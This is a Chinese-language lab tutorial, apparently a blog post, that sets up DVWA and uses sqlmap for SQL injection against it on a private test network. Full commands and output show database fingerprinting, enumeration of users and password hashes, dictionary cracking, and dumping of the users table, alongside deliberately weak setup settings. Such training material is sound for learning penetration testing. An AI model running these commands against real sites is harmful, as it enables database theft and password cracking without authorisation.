(1).SQL概念
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。例:12306.cn和csdn等网站帐号和密码的泄露,都有可能是sql注入导致的。
(2).SQLmap
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官网:http://sqlmap.org/
(3).实验环境
youxi1 192.168.1.6 SQLmap
youxi2 192.168.1.7 渗透测试演练系统DVWA
(4).youxi1上安装SQLmap
安装python
[root@youxi1 ~]# yum -y install python [root@youxi1 ~]# python -V Python 2.7.5
然后将下载好的SQLmap源码包上传,并解压运行.
[root@youxi1 ~]# cd /usr/local/
[root@youxi1 local]# tar zxf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
[root@youxi1 local]# ls
bin include libexec sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz
etc lib sbin sqlmapproject-sqlmap-7eab1bc
games lib64 share src
[root@youxi1 local]# mv sqlmapproject-sqlmap-7eab1bc/ sqlmap/ //文件夹重命名
[root@youxi1 local]# cd sqlmap
[root@youxi1 sqlmap]# ls //python是解释型
doc lib procs shell sqlmap.conf tamper txt waf
extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml
[root@youxi1 sqlmap]# ./sqlmap.py //python是解释型语言,类似shell,不需要编译可以直接运行
___
__H__
___ ___[.]_____ ___ ___ {1.0.10.24#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
创建一个软链接
[root@youxi1 sqlmap]# ln -s /usr/local/sqlmap/sqlmap.py /usr/bin/sqlmap
[root@youxi1 sqlmap]# sqlmap -h
___
__H__
___ ___[.]_____ ___ ___ {1.0.10.24#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
......
(5).youxi2上安装渗透测试演练系统DVWA
使用yum命令快速搭建LNMP环境,并进行简单测试
[root@youxi2 ~]# yum -y install httpd php php-mysql php-gd mariadb-server mariadb
[root@youxi2 ~]# systemctl start httpd && systemctl enable httpd //启动httpd并设置开机自启
Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
[root@youxi2 ~]# systemctl start mariadb && systemctl enable mariadb //启动mariadb并设置开机自启
Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
[root@youxi2 ~]# vim /var/www/html/test.php //制作简单测试页面
<?php
phpinfo();
?>
[root@youxi2 ~]# mysqladmin -u root password "123456" //设置mysql的root密码
[root@youxi2 ~]# mysql -uroot -p123456 //尝试登陆
Welcome to the MariaDB monitor. Commands end with ; or g.
Your MariaDB connection id is 4
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
MariaDB [(none)]>
使用Windows查看测试页面
下载DVWA并上传(官网:http://www.dvwa.co.uk/),解压到httpd网页主目录
[root@youxi2 ~]# yum -y install unzip [root@youxi2 ~]# unzip -d /var/www/html/ DVWA-1.9.zip [root@youxi2 ~]# ls /var/www/html/ DVWA-1.9 test.php [root@youxi2 ~]# chown -R apache:apache /var/www/html/DVWA-1.9/ [root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php //修改配置文件 $_DVWA[ 'db_password' ] = '123456'; //第18行,数据库的root密码
在Windows浏览器中输入http://192.168.1.7/DVWA-1.9/setup.php,进入安装DVWA界面
这里有两个错误的PHP function allow_url_include: Disabled和reCAPTCHA key: Missing。其中前一个报错是要求开启php中的allow_url_include参数,后一个报错实际是需要reCAPTCHA私钥和公钥。
[root@youxi2 ~]# vim /etc/php.ini allow_url_include = On //第815行,开启allow_url_include [root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php $_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg'; //第26行和第27行 $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ'; [root@youxi2 ~]# systemctl restart httpd //重启httpd
刷新页面,显示如下正常页面即可安装
安装完成后会自动跳转登陆页面http://192.168.1.7/DVWA-1.9/login.php,输入账号密码登陆。账号密码默认为admin和password
登陆成功显示如下页面
(6).扩展:reCAPTCHA
1)概念
CMU设计了一个名叫reCAPTCHA的强大系统,让他们的电脑去向人类求助。具体做法是:将OCR(光学字符识别)软件无法识别的文字扫描图传给世界各大网站,用以替换原来的验证码图片;那些网站的用户在正确识别出这些文字之后,其答案便会被传回CMU。
OCR概述:OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;
2)生成自己的谷歌开源免费验证码reCAPTCHA的公钥和私钥
访问https://www.google.com/recaptcha/admin/create(需要VPN)并用google账户登录,在文本框输入自己网站的网址,如global-key.mycompany.com ,点击create key,生成Public Key和Private Key。
(7).实验
SQLmap语法:SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。具体使用sqlmap -h详细查看。
1)枚举登陆数据的用户名和密码
使用SQLmap之前需要得到当前会话的cookie等信息,用来在渗透过程中维持连接状态。而Cookie使用其复数形式时称为cookies,是指某些网站为了识别用户的身份、进行session跟踪,而存储在用户本地终端上的数据(通常是经过加密)。只要登录过网站,就会在用户本地产生cookie,主要用于身份识别、进行session会话跟踪。
如何找到Cookies值呢?如果使用的是谷歌浏览器,按F12-->找到Application-->选择其中的Cookies-->最后可以在里面找到对应的值。
另外为了方便测试,这里将DVWA安全设置为低
准备一个SQL注入点
最后整理一下:注入点http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#,Cookies值"PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low"
开始执行sqlmap
[root@youxi1 sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookies="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -b --current-db --current-user ...... //第一个交互说,这个后台数据库管理系统像是Mysql,是否直接跳过不再扫描其他类型的数据库 it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]Y
//第二个交互说,是否想要测试一些Mysql的其他项 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]n ......
//第三个交互说,是否继续测试别的 GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]N ...... [19:33:07] [INFO] testing MySQL [19:33:07] [INFO] confirming MySQL [19:33:07] [INFO] the back-end DBMS is MySQL [19:33:07] [INFO] fetching banner web server operating system: Linux CentOS //系统类型 web application technology: Apache 2.4.6, PHP 5.4.16 //环境 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) banner: '5.5.60-MariaDB' //mariadb版本 [19:33:07] [INFO] fetching current user current user: 'root@localhost' //当前数据库用户 [19:33:07] [INFO] fetching current database current database: 'dvwa' //当前数据库 [19:33:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7' [*] shutting down at 19:33:07
sqlmap命令选项说明:
-u:指定目标URL,sql注入点;
--cookie : 当前会话的cookie值;
-b : 获取数据库类型,检索数据库管理系统的标识;
--current-db : 获取当前数据库;
--current-user :获取当前登录数据库使用的用户。
2)使用命令枚举所有登陆mysql数据库的用户名和密码hash值,后期可以对密码hash值进行破解,生成明文密码
[root@youxi1 sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" --string="Surname" --users --password
......
//是否将哈希存储到临时文件中,以便最终使用其他工具进行进一步处理
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
......
//是否对检索到的密码哈希执行基于字典的攻击,即是否解析密码为明文密码
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]Y
[20:30:40] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
//1是使用默认字典(默认),2自定义字典文件,3包含字典文件列表的文件
[1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> //默认1
[20:33:18] [INFO] using default dictionary
//是否要使用常用密码后缀(慢!)
do you want to use common password suffixes? (slow!) [y/N]y
......
database management system users [6]: //数据库用户列表
[*] ''@'localhost'
[*] ''@'youxi2'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'youxi2'
......
[20:44:44] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:44:44] [INFO] starting 4 processes
[20:44:44] [INFO] cracked password '123456' for user 'root' //123456为root用户的密码
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 //密码的哈希值
clear-text password: 123456 //明文密码
password hash: NULL
[20:44:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
sqlmap命令选项说明:
--string : 当查询可用时用来匹配页面中的字符串;
--users : 枚举DBMS用户;(DBMS数据库管理系统)
--password : 枚举DBMS用户密码hash。
3)枚举dvwa库中的表
[root@youxi1 sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa --tables ...... Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+ [21:16:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7' [*] shutting down at 21:16:09
sqlmap命令选项说明:
-D : 要枚举的DBMS数据库;
--tables:枚举DBMS数据库中的数据表。
4)获取dvwa库中的users表的列名称
[root@youxi1 sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users --columns ...... Database: dvwa Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +--------------+-------------+ [21:25:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7' [*] shutting down at 21:25:29
sqlmap命令选项说明:
-T : 要枚举的DBMS数据库表;
--columns : 枚举DBMS数据库表中的所有列。
5)拖库,将dvwa库中的users表中
[root@youxi1 sqlmap]# sqlmap -u "http://192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users -C user,password --dump ...... do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y [21:46:06] [INFO] writing hashes to a temporary file '/tmp/sqlmapRAF75510073/sqlmaphashes-oREeV4.txt' do you want to crack them via a dictionary-based attack? [Y/n/q] Y [21:46:20] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > [21:46:33] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y ...... Database: dvwa Table: users [5 entries] +---------+---------------------------------------------+ | user | password | +---------+---------------------------------------------+ | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | +---------+---------------------------------------------+ [21:47:05] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.1.7/dump/dvwa/users.csv' [21:47:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7' [*] shutting down at 21:47:05
sqlmap命令选项说明:
--dump : 转储DBMS数据表项。